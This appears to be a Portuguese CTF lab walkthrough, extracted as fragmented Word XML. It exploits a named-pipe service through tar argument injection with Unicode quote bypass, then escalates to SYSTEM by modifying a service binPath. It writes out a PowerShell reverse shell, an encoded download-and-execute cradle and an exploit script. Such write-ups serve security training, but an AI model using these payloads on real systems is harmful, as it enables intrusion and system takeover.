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xgrkp4mr1pm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6qaeqlblmqs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New Year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ar3u8m26pabh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inicial da máquina foi feita com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portas abertas e os serviços expostos.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25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="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identificou as portas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135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(MSRPC),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139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(NetBIOS),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445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(SMB),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3389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(RDP) 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49669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(RPC dinâmico) abertas no sistema.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smbclient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enumerar os compartilhamentos do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autenticado como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necessidade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 -U guest -p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87500"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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enumeração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identificado um compartilhamento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share.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realizada a conexão ao compartilhamento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baixado do compartilhamento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máquina local.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//&lt;machine-ip&gt;/share -U guest -p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25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="3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Conteúdo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análise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indicou que se trata de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cria e manipula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Named Pipe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executado diretamente na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memória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sistema.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pywintypes,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win32con,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\\.\pipe\CustomNamedPipeScript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json.loads(self.data)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'args'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"Args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hasattr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getattr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])(data[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'args'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 not found."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{e}"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json.dumps(response)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'url'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'compression'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 not defined."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].split(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filename_download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f"C:\\files_downloaded\\{filename}"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"_%Y%m%d%H%M%S"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request.status_code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(filename_download,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file.write(request.content)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subprocess.Popen([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'compression'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f"{filename_download}.tar.gz"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filename_download])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f"File {filename} downloaded successfully."</w:t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  <w:tab/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downloading file: {request.status_code}"</w:t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{e}"</w:t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create_pipe_with_permissions(self,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win32security.SECURITY_DESCRIPTOR()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security_descriptor.Initialize()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security_descriptor.SetSecurityDescriptorDacl(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everyone,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win32security.LookupAccountName(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"Everyone"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win32security.ACL()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acl.AddAccessAllowedAce(win32security.ACL_REVISION,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win32con.GENERIC_ALL,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everyone)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security_descriptor.SetSecurityDescriptorDacl(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security_attributes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pywintypes.SECURITY_ATTRIBUTES()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security_attributes.SECURITY_DESCRIPTOR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security_descriptor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win32pipe.CreateNamedPipe(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win32pipe.PIPE_ACCESS_DUPLEX,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win32pipe.PIPE_TYPE_MESSAGE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win32pipe.PIPE_WAIT,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security_attributes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handle_client(self,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connected."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win32file.ReadFile(pipe,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ProcessData(data.decode(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)).run()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win32file.WriteFile(pipe,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response.encode(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pywintypes.error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disconnected."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win32file.CloseHandle(pipe)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"Pipe closed."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f"Creating named pipe: {PIPE_NAME}"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self.create_pipe_with_permissions(PIPE_NAME)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"Waiting for client to connect..."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win32pipe.ConnectNamedPipe(pipe,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self.handle_client(pipe)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PipeServer().server()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processa dados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realizando requisições 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fornecida.</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Caso o arquivo recebido seja considerado válido, ele é compactado no formato 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tar.gz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Style w:val="Heading1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bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.hcdc9m6gxz3b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linha 50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script foi identificada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  <w:t xml:space="preserve">O valor da chave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compression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recebido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concatenado diretamente em uma chamada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subprocess.Popen,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a execução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arbitrária de comandos no sistema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subprocess.Popen([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'compression'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{filename_download}.tar.gz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filename_download])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22500"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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explorar a falha, foi desenvolvido um script capaz de se comunicar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Named Pipe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injetando comandos por meio do campo vulnerável e resultando na execução de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sistema.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script.ps1 (reverse-shell)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hospedado em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servidor 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localmente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script.ps1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establishing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Start-Sleep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-Seconds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$TCPClient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Net.Sockets.TCPClient(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'&lt;vpn-ip&gt;'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&lt;vpn-port&gt;)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($TCPClient.Connected)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$NetworkStream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$TCPClient.GetStream()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IO.StreamWriter($NetworkStream)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WriteToStream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($String)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determined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65536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[byte[]]$script:Buffer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..$TCPClient.ReceiveBufferSize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$StreamWriter.Write($String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'SHELL&gt;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$StreamWriter.Flush()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WriteToStream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NetworkStream.Read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happen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(($BytesRead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$NetworkStream.Read($Buffer,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$Buffer.Length))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-gt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byte/newline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([text.encoding]::UTF8).GetString($Buffer,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$BytesRead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Invoke-Expression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Out-String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Out-String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WriteToStream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underlying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TCPClient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$StreamWriter.Close()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utilizado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iwr,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responsável por realizar uma requisição ao servidor na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obter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contém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sendo então executado diretamente em memória por meio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iex.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D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esse comando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copiado para o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CyberChef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apenas as etapas de codificação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foram realizadas, sendo convertido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UTF-16LE (1200)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em seguida,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sua execução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PowerShell.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$x=iwr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-usebasicparsing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//&lt;machine-ip&gt;/script.ps1; iex($x);</w:t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JAB4AD0AaQB3AHIAIAAtAHUAcwBlAGIAYQBzAGkAYwBwAGEAcgBzAGkAbgBnACAAaAB0AHQAcAA6AC8ALwAxADAALgAwAC4ANQAuADEAMAA5AC8AcwBjAHIAaQBwAHQALgBwAHMAMQA7ACAAaQBlAHgAKAAkAHgAKQA7AA==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payload gerado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Base64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posteriormente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utilizado no script de exploração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  <w:t xml:space="preserve">Para que o comando fosse executado corretamente, foi necessário realizar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 de filtros Unicode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apresenta uma particularidade: o contorno dos filtros é possível por meio do uso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caracteres Unicode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especificamente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aspas Unicode (FF02)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burlar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restrições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parsing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Referências técnicas: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https://worst.fit/worstfit/Arg-Splitting/tar/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hyperlink r:id="rId1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https://blog.orange.tw/posts/2025-01-worstfit-unveiling-hidden-transformers-in-windows-ansi/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Esses materiais descrevem técnicas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argument splitting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abuso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evasão de validações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Windows.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win32file,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\\&lt;machine-ip&gt;\pipe\CustomNamedPipeScript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Substitua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hostname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{PIPE_NAME}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handle = win32file.CreateFile(</w:t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PIPE_NAME,</w:t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win32file.GENERIC_READ | win32file.GENERIC_WRITE,</w:t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0, None, win32file.OPEN_EXISTING, 0, None</w:t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)</w:t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message = json.dumps({</w:t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'action': 'download',</w:t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'args': {</w:t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'url': 'http://&lt;machine-ip&gt;:9090/file.txt',</w:t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</w:t>
        <w:tab/>
        <w:t xml:space="preserve">'compression': '--use-compress-program=powershell /enc &lt;base64&gt;\uFF02 \uFF02-zcvf' #Substitua pelo base64 gerado</w:t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})</w:t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{message}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win32file.WriteFile(handle, message.encode('utf-8'))</w:t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result, response = win32file.ReadFile(handle, 1024)</w:t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{response.decode(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win32file.CloseHandle(handle)</w:t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  <w:tab/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{e}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__name__ ==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__main__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iniciado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servidor Python 3 na porta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hospedar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Uma segunda porta,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utilizada exclusivamente para hospedar um arquivo válido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necessário para a exploração.</w:t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00100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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fim,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exploit teste.py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executado, resultando na obtenção da reverse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 alvo.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011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\\&lt;machine-ip&gt;\IPC$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/u:guest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conexões foram estabelecidas com sucesso nas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recebida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reverse shell estabelecida, foi obtido acesso ao sistema como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1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27500"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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flag de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C:\Users\john\Desktop.</w:t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16200"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="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8aql43pyoofa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esse comando foi possível enumerar todos os serviços da máquina, incluindo serviços padrão do sistema.</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Durante a análise, foi identificado um serviço localizado fora do caminho padrão, diretamente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C:\Program Files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uma possível configuração do usuário.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'reg query HKLM\SYSTEM\CurrentControlSet\Services /v ImagePath /s | findstr /i /v "system32 drivers windows"'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ForEach-Object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"Services\\(.+)"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$matches[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query $n 2&gt;&amp;1"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($test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-notmatch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"Access is denied"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"[+] SERVICE FOUND: $n"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Green;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qc $n | findstr BINARY_PATH_NAME"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25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="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verificado que o usuário possui permissão para parar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DownloaderServer,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confirmando privilégios suficientes para interagir com esse serviço.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DownloaderServer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25400" l="25400" r="25400" t="2540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br w:type="textWrapping"/>
        <w:t xml:space="preserve">Se for possível alterar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binPath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serviço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reiniciá-lo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torna-se viável forçar a execução de comandos arbitrários pelo próprio serviço, resultando em execução com privilégios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 AUTHORITY\SYSTEM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  <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">A seguir, foi confirmado que o usuário possui permissão para modificar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binPath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serviço.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013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config DownloaderServer binPath= ""teste"""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qc DownloaderServer"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27200"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="5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alterar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binPath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executar um comando que realiza uma requisição à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controlada pelo atacante e, em seguida, executar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que a exploração fosse realizada com sucesso, foi necessário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reiniciar o serviço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garantindo a aplicação das modificações e a execução do comando configurado.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014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config DownloaderServer binPath= ""C:\Windows\System32\cmd.exe /c powershell /enc &lt;base64&gt;"""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Substitua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gerado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anteriormente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 start DownloaderServer"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5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33400"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="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script.ps1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recebida novamente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porta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a execução do comando configurado no serviço.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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recebida com privilégios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NT AUTHORITY\SYSTEM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resultando em controle total do sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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C:\Users\Administrator\Desktop.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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headerReference r:id="rId37" w:type="even"/>
      <w:footerReference r:id="rId38" w:type="default"/>
      <w:footerReference r:id="rId39" w:type="first"/>
      <w:footerReference r:id="rId4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rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.om5nphop57lo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1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50" name="image19.png"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic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New Year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3.xml"/><Relationship Id="rId20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7.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1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4.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image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hyperlink" Target="https://app.hackingclub.com/training/training-machines/230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11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://tar.gz" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gchq.github.io/CyberChef/" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://raw.githubusercontent.com/martinsohn/PowerShell-reverse-shell/refs/heads/main/powershell-reverse-shell.ps1" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://worst.fit/worstfit/Arg-Splitting/tar/" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.orange.tw/posts/2025-01-worstfit-unveiling-hidden-transformers-in-windows-ans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Relationship Id="rId2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2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u0qPWzn180uG3ccBV+JQJGE0w==">CgMxLjAyDmgueGdya3A0bXIxcG02Mg5oLmQ2cWFlcWxibG1xczIOaC5hcjN1OG0yNnBhYmgyDmguaGNkYzltNmd4ejNiMg5oLjhhcWw0M3B5b29mYTIOaC5vbTVucGhvcDU3bG84AHIhMWhuTG1tRmNzU2ZUZHp4dmMzY3Zob0VsZjNzYUVnaFp3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